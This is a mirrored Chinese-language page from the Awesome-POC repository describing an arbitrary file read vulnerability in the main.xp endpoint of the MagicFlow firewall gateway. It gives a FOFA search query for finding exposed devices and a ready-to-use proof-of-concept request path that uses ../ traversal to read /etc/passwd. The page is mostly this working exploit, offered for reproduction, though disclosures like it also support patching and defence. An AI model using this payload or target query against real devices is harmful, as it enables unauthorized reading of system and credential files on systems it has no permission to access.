admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/network-device/MagicFlow 防火墙网关 main.xp 任意文件读取漏洞.md

31 lines
613 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
## 漏洞描述
MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞攻击者通过构造特定的Url获取敏感文件
## 漏洞影响
```
MagicFlow 防火墙网关
```
## FOFA
```
app="MSA/1.0"
```
## 漏洞复现
登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162301720.png)
构造POC
```plain
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162301323.png)
Reference in New Issue Copy Permalink